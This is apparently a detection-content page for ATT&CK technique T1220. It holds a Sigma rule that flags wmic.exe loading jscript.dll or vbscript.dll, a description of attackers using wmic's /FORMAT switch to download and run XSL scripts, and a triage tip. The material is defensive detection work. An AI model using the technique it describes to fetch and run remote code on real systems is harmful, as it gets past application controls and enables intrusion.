since the imageload event doesn't have enough information in this case. it's better to look at the recent process creation events that spawned the wmic process and investigate the command line and parent/child processes to get more insights

t1220
windows
sigma

Techniques

t1220

Sample rules

WMIC Loading Scripting Libraries

source: sigma
technicques:
- t1220

Description

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e js, vbs, etc).

Detection logic

condition: selection
selection:
  ImageLoaded|endswith:
  - \jscript.dll
  - \vbscript.dll
  Image|endswith: \wmic.exe